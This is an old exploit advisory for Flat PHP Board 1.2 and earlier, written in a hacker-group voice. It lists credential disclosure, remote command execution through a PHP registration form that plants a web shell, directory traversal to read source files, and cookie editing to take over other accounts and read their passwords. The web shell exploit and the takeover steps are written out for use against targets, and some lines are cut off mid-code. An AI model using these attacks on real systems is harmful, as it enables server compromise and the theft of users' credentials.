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Flat PHP Board <= 1.2 Multiple Vulnerabilities

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Http://www.inj3ct-it.org             Staff[at]inj3ct-it[dot]org 


Flat PHP Board <= 1.2 Multiple Vulnerabilities


#By KiNgOfThEwOrLd                              

Remote User Credentials Disclosure


No much to say...an attacker can get his target's informations visiting 

The informations will be showed in this way:

[username] [password] [email]
Multiple Remote Command Executions / File Uploading


When we register a new account, flat php board make a file like 
All the fields (Username, Password, Email) are not correctly filtred. Then, an 
attacker can executes a malicious code on the vulnerable server.


//Usage: 31337.php?targ=http://[target]/[flat_php_board_path]
$targ = $_GET['targ'];
echo '
<form action=index.php method=post>
<input type=hidden name="username" value="../31337">
<input type=hidden name=a value=register2>
<input name="password" type=hidden value="r0x">
<input name="password2" type=hidden value="r0x">
<input name="email" 
<input type=submit value="Exploit!">
This will make a shell in http://[target]/[flat_php_board_path]/31337.php
Usage: http://[target]/[flat_php_board_path]/31337.php?r0x=[php_code]

Nb. also all the fields of index.php?a=profile is not correctly parsed.
Remote Directory Traversal / Source Disclosure

http://[target]/[flat_php_board_path]index.php?a=topic&topic=../[arbitrary php 

 php file]
Remote Cookie Manipoulation / Privilege Escalation


An attacker can login with an arbitrary account editing the fpb_username cookie.

In fact, if you try to replace your username with your target username and 
refresh, you will be logged in like him. But now, if you try to edit your 
profile or something like that, you will generate an error like:

Error with cookies. password/username not correct.

Don't worry, if you go to index.php?a=profile you will find your victim 
credentials. Then, viewing the source code you can view your victim password as:

<td bgcolor=#f9f9f9><font face="verdana" size=2>Password:</font></td>
<td bgcolor=#f9f9f9><input name="password" type=password 
Ok, i think that's all :S